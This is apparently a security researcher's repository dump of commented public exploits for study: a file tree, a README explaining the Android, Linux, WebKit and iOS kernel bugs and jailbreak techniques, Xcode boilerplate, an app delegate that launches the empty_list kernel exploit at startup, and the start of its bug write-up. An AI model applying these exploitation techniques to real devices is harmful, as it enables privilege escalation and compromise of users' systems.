├── 1day └── webkit-CVE-2017-2547_standalone_version.html ├── CVE-2016-2434 └── exploit_CVE-2016-2434_commented.c ├── CVE-2016-5342 ├── exploit_mp3_bypass_pxn_commented.c └── exploit_tty_bypass_pxn_commented.c ├── CVE-2016-8655 └── CVE-2016-8655_chocobo_root_commented.c ├── CVE-2018-4233 ├── LICENSE └── pwn_i8.js ├── README.md ├── empty_list ├── __MACOSX │ └── empty_list │ │ ├── ._empty_list.xcodeproj │ │ ├── empty_list.xcodeproj │ │ └── ._project.xcworkspace │ │ └── empty_list │ │ ├── ._AppDelegate.h │ │ ├── ._AppDelegate.m │ │ ├── ._Info.plist │ │ ├── ._README │ │ ├── ._ViewController.h │ │ ├── ._ViewController.m │ │ ├── ._kmem.c │ │ ├── ._kmem.h │ │ ├── ._main.m │ │ ├── ._offsets.h │ │ ├── ._offsets.m │ │ ├── ._sploit.c │ │ ├── ._sploit.h │ │ ├── Assets.xcassets │ │ └── ._Contents.json │ │ └── Base.lproj │ │ ├── ._LaunchScreen.storyboard │ │ └── ._Main.storyboard └── empty_list │ ├── empty_list.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata │ │ │ └── ianbeer.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ └── xcuserdata │ │ └── ianbeer.xcuserdatad │ │ ├── xcdebugger │ │ └── Breakpoints_v2.xcbkptlist │ │ └── xcschemes │ │ └── xcschememanagement.plist │ └── empty_list │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json │ ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard │ ├── Info.plist │ ├── README │ ├── ViewController.h │ ├── ViewController.m │ ├── kmem.c │ ├── kmem.h │ ├── main.m │ ├── offsets.h │ ├── offsets.m │ ├── sploit.c │ └── sploit.h ├── extra_recipe ├── extra_recipe-cydia │ ├── README.md │ ├── extra_recipe.xcodeproj │ │ ├── project.pbxproj │ │ ├── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcuserdata │ │ │ │ └── ianbeer.xcuserdatad │ │ │ │ └── UserInterfaceState.xcuserstate │ │ └── xcuserdata │ │ │ └── ianbeer.xcuserdatad │ │ │ └── xcschemes │ │ │ ├── extra_recipe.xcscheme │ │ │ └── xcschememanagement.plist │ └── extra_recipe │ │ ├── 0.reload.plist │ │ ├── AppDelegate.swift │ │ ├── Assets.xcassets │ │ └── AppIcon.appiconset │ │ │ └── Contents.json │ │ ├── Base.lproj │ │ ├── LaunchScreen.storyboard │ │ └── Main.storyboard │ │ ├── Info.plist │ │ ├── README │ │ ├── ViewController.swift │ │ ├── bootstrap.tar │ │ ├── def.plist │ │ ├── dex.plist │ │ ├── dropbear.plist │ │ ├── extra_recipe-Bridging-Header.h │ │ ├── jailbreak.c │ │ ├── launchctl │ │ ├── load_regs_and_crash.s │ │ ├── mach-portal.dylib │ │ ├── mach_portal.dylib │ │ ├── offsets.h │ │ ├── offsets.m │ │ ├── patchfinder64.c │ │ ├── patchfinder64.h │ │ ├── pte_stuff.h │ │ ├── reload │ │ ├── tar │ │ ├── unjail.h │ │ └── unjail.m ├── extra_recipe-master │ ├── README.md │ ├── extra_recipe.xcodeproj │ │ ├── project.pbxproj │ │ ├── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcuserdata │ │ │ │ └── ianbeer.xcuserdatad │ │ │ │ └── UserInterfaceState.xcuserstate │ │ └── xcuserdata │ │ │ └── ianbeer.xcuserdatad │ │ │ └── xcschemes │ │ │ ├── extra_recipe.xcscheme │ │ │ └── xcschememanagement.plist │ └── extra_recipe │ │ ├── AppDelegate.swift │ │ ├── Assets.xcassets │ │ └── AppIcon.appiconset │ │ │ └── Contents.json │ │ ├── Base.lproj │ │ ├── LaunchScreen.storyboard │ │ └── Main.storyboard │ │ ├── Info.plist │ │ ├── README │ │ ├── ViewController.swift │ │ ├── bootstrap.tar │ │ ├── def.plist │ │ ├── dex.plist │ │ ├── extra_recipe-Bridging-Header.h │ │ ├── jailbreak.c │ │ ├── launchctl │ │ ├── load_regs_and_crash.s │ │ ├── mach-portal.dylib │ │ ├── mach_portal.dylib │ │ ├── offsets.h │ │ ├── offsets.m │ │ ├── patchfinder64.c │ │ ├── patchfinder64.h │ │ ├── pte_stuff.h │ │ ├── tar │ │ ├── unjail.h │ │ └── unjail.m └── yalu102-master │ ├── .github │ └── ISSUE_TEMPLATE.md │ ├── .gitignore │ ├── LICENSE │ ├── README.md │ ├── yalu102.xcodeproj │ ├── project.pbxproj │ └── project.xcworkspace │ │ └── contents.xcworkspacedata │ └── yalu102 │ ├── 0.reload.plist │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ └── AppIcon.appiconset │ │ ├── AppIcon40x40@2x~ipad-1.png │ │ ├── AppIcon40x40@2x~ipad.png │ │ ├── AppIcon40x40@2x~ipadnotif.png │ │ ├── AppIcon40x40@2x~ipadsptl-1.png │ │ ├── AppIcon40x40@2x~ipadsptl.png │ │ ├── AppIcon40x40@2x~ipadsptl3.png │ │ ├── AppIcon40x40@2x~ipadsptlsmal.png │ │ ├── AppIcon40x40@3x~iphone.png │ │ ├── AppIcon40x40~ipad-1.png │ │ ├── AppIcon40x40~ipad-2.png │ │ ├── AppIcon40x40~ipad.png │ │ ├── AppIcon60x60.png │ │ ├── AppIcon60x60@2x.png │ │ ├── AppIcon60x60@2x~ipad.png │ │ ├── AppIcon60x60@2x~ipadpro.png │ │ ├── AppIcon60x60@3x.png │ │ ├── AppIcon60x60~ipad.png │ │ └── Contents.json │ ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard │ ├── IOKit.tbd │ ├── Info.plist │ ├── ViewController.h │ ├── ViewController.m │ ├── bootstrap.tar │ ├── devicesupport.h │ ├── devicesupport.m │ ├── dropbear.plist │ ├── iokitmig64.o │ ├── jailbreak.m │ ├── launchctl │ ├── main.m │ ├── offsets.c │ ├── offsets.h │ ├── patchfinder64.h │ ├── patchfinder64.o │ ├── pte_stuff.h │ ├── reload │ └── tar ├── jsc_ConcatMemcpy_infoleak └── ileak.html └── jsc_prop_enum_uaf ├── LICENSE ├── ibin.js └── index.html /1day/webkit-CVE-2017-2547_standalone_version.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 362 | 363 | -------------------------------------------------------------------------------- /CVE-2018-4233/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2018, Niklas Baumstark 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 2. Redistributions in binary form must reproduce the above copyright notice, 10 | this list of conditions and the following disclaimer in the documentation 11 | and/or other materials provided with the distribution. 12 | 13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 14 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 15 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR 17 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND 20 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | 24 | The views and conclusions contained in the software and documentation are those 25 | of the authors and should not be interpreted as representing official policies, 26 | either expressed or implied, of the FreeBSD Project. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # About 2 | 3 | This is where I will post analysis of Public Exploits, or some of my 1day exploits. 4 | 5 | 6 | 7 | ## [ Public exploit analysis ] 8 | 9 | - Personally I think the best way to learn a public exploit is by understanding it line-by-line until I can understand the exploit to the fullest. I will post some of these (overly-commented ;) ) exploits so hopefully others can learn from it, and as an attempt to give something back to the community. Also for documenting purposes, cause these things kind of fade away from my head as time passes. 10 | 11 | ### CVE-2016-8655 12 | 13 | - This is a detailed analysis of [rebel's exploit](http://seclists.org/oss-sec/2016/q4/621). 14 | - Thanks **rebel** for the awesome exploit! :D 15 | 16 | ### CVE-2016-5342 17 | #### mp3 version 18 | - This is a commented version of [freener's android LPE exploit](https://github.com/freener/exploits/blob/master/CVE-2016-5342/exploit_mp3_bypass_pxn.c) 19 | - arm32 20 | - Heap overflow 21 | - This exploit directly overwrites a function pointer of another object 22 | 23 | #### tty version 24 | - This is a commented version of [freener's android LPE exploit](https://github.com/freener/exploits/blob/master/CVE-2016-5342/exploit_tty_bypass_pxn.c) 25 | - arm32 26 | - Heap overflow 27 | - This exploit overwrites an object pointer in another object. It uses ret2dir attack to make the corrupted pointer point to a predictable fixed address in kernel which holds the exploit payload. This exploit technique bypasses PXN & PAN. 28 | 29 | ### CVE-2016-2434 30 | - This is a commented version of [Jianqiang Zhao's android LPE exploit](https://github.com/jianqiangzhao/CVE-2016-2434) 31 | - arm64 32 | - Zero-out 16 bytes at an arbitrary address 33 | - This exploit wipes out 16 bytes of a useful global object, which is located at a fixed address in kernel. 34 | - A corrupted object pointer within the global object references exploit payload from userland. This kind of attack will not work on devices/kernels with PAN(or PAN emulation). 35 | 36 | ### extra_recipe 37 | - My attempt to understand the extra_recipe jailbreak 38 | - I was especially interested in the kpp bypass part. Although there were a couple slides on the subject where I could glean a vague image of the bypass, I really wanted to dig into the fine details and see what is actually going on inside the code 39 | - I also wanted to understand the final ingredients for a jailbreak(Installing Cydia, etc.) 40 | 41 | #### yalu102 (ViewController.m) 42 | - I commented the part relevant to the actual bug, and how it was exploited. 43 | - The reason why I looked into yalu102 instead of the original exploit is because the port-feng-shui technique looked more cleaner and straightforward to understand. 44 | - The analysis stops right before the kpp bypass 45 | 46 | #### xerub's extra_recipe-master (jailbreak.c, unjail.m, patchfinder64.c, pte_stuff.h) 47 | - I jump here because it had a little more information on the various numeric offsets. 48 | - Also, the patchfinder.c is intact, as opposed to yalu102 which there is only an object file. 49 | - The cydia part is kind of incomplete so I jump to the cydia branch after kpp 50 | 51 | #### xerub's extra_recipe-cydia (unjail.m) 52 | - Trying to understand the ingredients for a jailbreak after tfp0 and post-exploitation 53 | 54 | ### empty_list (sploit.c) 55 | - A detailed breakdown of Ian Beer's [empty_list kernel exploit](https://bugs.chromium.org/p/project-zero/issues/detail?id=1564). 56 | - It uses amazing techniques to start from really weak primitives, to build a stronger AAR, and finally build a full-fledged task port. The port magic behind the exploit code is unbelievable. All of this with an 8 NULL byte heap overflow. Absolutely mindblowing. 57 | - I've scribbled some naive ideas to improve the reliability. Hopefully someone will release a more reliable version of the exploit in the future. :) 58 | - Thanks **Ian Beer** for the amazing exploit! 59 | 60 | ### CVE-2018-4233 61 | - This is a commented version of @niklas_b's [iOS Webkit exploit](https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1). 62 | - A huge thanks to [kudima](https://github.com/kudima)([@begger_dd](https://twitter.com/begger_dd)) to the very clear and concise, thoroughly annotated writeup! :) 63 | - The writeup explains the JIT type confusion bug, some limitations on conversions of boxing/unboxing(which could introduce unreliability), and a detailed walkthrough of how the early/late AAR/AAW primitives are constructed. He also provides insight on the changes in exploitation techniques after the recent round of mitigations(index masking, ArrayBuffer backing store poisoning, Some changes on the mechanism of W^X JIT, changes in the JSObject structure, etc) 64 | 65 | ### jsc_ConcatMemcpy_infoleak 66 | - This is a commented version of kudima's WebKit infoleak exploit(fixed in 2018.8.27). 67 | - It stems from an incomplete fix from one of the bugs reported by lokihardt. The patch from lokihardt's report fixed the Double -> Object type confusion primitive, but didn't fix it the other way around; Object -> Double. 68 | - It sprays the webkit heap with butterflies containing a single object and a marker, and later on triggers the concat bug and fills a large portion of several double arrays with uninitialized heap data. It iterates through the uninitialized, buggy concat produced, double arrays until it finds the previously sprayed object's address, and leaks it. 69 | - Thanks again [kudima](https://github.com/kudima)([@begger_dd](https://twitter.com/begger_dd)) for the nice exploit and writeup! :) 70 | 71 | ### jsc_prop_enum_uaf 72 | - This is another contribution from [kudima](https://github.com/kudima). It is a commented version of kudima's WebKit remote code execution exploit(fixed in [this commit](https://github.com/WebKit/webkit/commit/011860e5cb6a702a987545580eb698efa34ace4e)). It is fixed in iOS 12.1, and works up to iOS 12.0.1. 73 | - The issue is that while executing code in baseline-jitted forin loops, you can introduce code that frees the StructureID object backing the JSOBject and trigger the garbage collector, but the garbage collector doesn't mark the "JSPropertyNameEnumerator->m_cachedStructureID" member, and the StructureID object that "JSPropertyNameEnumerator->m_cachedStructureID" points to gets freed during sweep phase resulting in a dangling pointer. 74 | - After the StructureID object is freed with GC, you can introduce code that creates a new StructureID object, which takes the previously freed "StructureID object" slot. 75 | - By freeing the StructureID of object A, and then making object B create a new StructureID which takes it's place, it is possible to make a type confusion situation because "JSPropertyNameEnumerator->m_cachedInlineCapacity" is set to object A's inline property size, while "JSPropertyNameEnumerator->m_cachedStructureID" points to the new Structure ID object which represents object B. This makes a check in 'op_get_direct_pname' pass and lets object B access inline properties out of it's boundaries. 76 | - This can be abused to build stronger primitives such as AAR/AAW, and further use that to execute arbitrary code. 77 | - Thanks [kudima](https://github.com/kudima)([@begger_dd](https://twitter.com/begger_dd)) for the cool exploit and very detailed writeup! :) 78 | 79 | ## [ 1Day ] 80 | 81 | ### CVE-2017-2547 82 | - One day I looked at [singi's exploit](https://github.com/theori-io/zer0con2018_singi/tree/master/code/safari) after it was presented at Zer0con 2018, and decided to improve it. 83 | - This is a standalone version of the exploit, before I integrated it into **pwnjs**. 84 | - The improvements include 85 | - Increased reliability(works flawlessly after extensive browsing sessions with contaminated memory) 86 | - Removed all hardcoded offsets to make it compatible with various browser versions 87 | - Used a different exploitation technique(the standard misalign technique) 88 | - Eventually integrated it into the pwnjs framework by creating a webkit prototype 89 | - Made the code a lot more readible, and added lots of comments 90 | - Special Thanks 91 | - **qwertyoruiop & Samuel Grob** for the amazing phrack article and public exploits 92 | - **Brian Pak & Andrew Wesie** for the awesome pwnjs framework! 93 | -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/._empty_list.xcodeproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/._empty_list.xcodeproj -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list.xcodeproj/._project.xcworkspace: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list.xcodeproj/._project.xcworkspace -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._AppDelegate.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._AppDelegate.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._AppDelegate.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._AppDelegate.m -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._Info.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._Info.plist -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._README: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._README -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._ViewController.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._ViewController.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._ViewController.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._ViewController.m -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._kmem.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._kmem.c -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._kmem.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._kmem.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._main.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._main.m -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._offsets.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._offsets.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._offsets.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._offsets.m -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._sploit.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._sploit.c -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._sploit.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._sploit.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/Assets.xcassets/._Contents.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/Assets.xcassets/._Contents.json -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/Base.lproj/._LaunchScreen.storyboard: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/Base.lproj/._LaunchScreen.storyboard -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/Base.lproj/._Main.storyboard: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/Base.lproj/._Main.storyboard -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/empty_list/empty_list.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | empty_list.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/AppDelegate.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface AppDelegate : UIResponder 4 | 5 | @property (strong, nonatomic) UIWindow *window; 6 | 7 | 8 | @end 9 | 10 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/AppDelegate.m: -------------------------------------------------------------------------------- 1 | #import "AppDelegate.h" 2 | #include "sploit.h" 3 | 4 | @interface AppDelegate () 5 | 6 | @end 7 | 8 | @implementation AppDelegate 9 | 10 | 11 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 12 | // Override point for customization after application launch. 13 | dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0), 14 | ^{vfs_sploit();}); 15 | return YES; 16 | } 17 | 18 | 19 | - (void)applicationWillResignActive:(UIApplication *)application { 20 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 21 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 22 | } 23 | 24 | 25 | - (void)applicationDidEnterBackground:(UIApplication *)application { 26 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 27 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 28 | } 29 | 30 | 31 | - (void)applicationWillEnterForeground:(UIApplication *)application { 32 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 33 | } 34 | 35 | 36 | - (void)applicationDidBecomeActive:(UIApplication *)application { 37 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 38 | } 39 | 40 | 41 | - (void)applicationWillTerminate:(UIApplication *)application { 42 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 43 | } 44 | 45 | 46 | @end 47 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/README: -------------------------------------------------------------------------------- 1 | empty_list - exploit for p0 issue 1564 (CVE-2018-4243) iOS 11.0 - 11.3.1 kernel r/w 2 | @i41nbeer 3 | 4 | BUG: 5 | getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall. 6 | 7 | When allocating a kernel buffer to serialize the attr list to there's the following comment: 8 | 9 | /* 10 | * Allocate a target buffer for attribute results. 11 | * Note that since we won't ever copy out more than the caller requested, 12 | * we never need to allocate more than they offer. 13 | */ 14 | ab.allocated = ulmin(bufferSize, fixedsize + varsize); 15 | if (ab.allocated > ATTR_MAX_BUFFER) { 16 | error = ENOMEM; 17 | VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER); 18 | goto out; 19 | } 20 | MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK); 21 | 22 | The problem is that the code doesn't then correctly handle the case when the user supplied buffer size 23 | is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code: 24 | 25 | /* Return attribute set output if requested. */ 26 | if (return_valid) { 27 | ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS; 28 | if (pack_invalid) { 29 | /* Only report the attributes that are valid */ 30 | ab.actual.commonattr &= ab.valid.commonattr; 31 | ab.actual.volattr &= ab.valid.volattr; 32 | } 33 | bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual)); 34 | } 35 | 36 | There's no check that the allocated buffer is big enough to hold at least that. 37 | 38 | Exploitation: 39 | I hope to publish a longer-form write up of this, these are some rough notes on how the exploit works: 40 | 41 | The bug gives you the ability to write 8 zero bytes off the end of a kalloc.16 allocation. Whilst it looks like you 42 | might be able to control a few bits in those bytes I'm not sure you actually can so I focused on exploiting 43 | as if it was writing a NULL pointer off the end. 44 | 45 | This is pretty limited primitive so the first step is to try to enumerate possible things you could do: 46 | * target a reference count, trying to turn the overflow into a UaF bug 47 | * target a lock, trying to turn the overflow into a race condition bug 48 | * target a pointer, trying to leak a reference count 49 | * target a validated 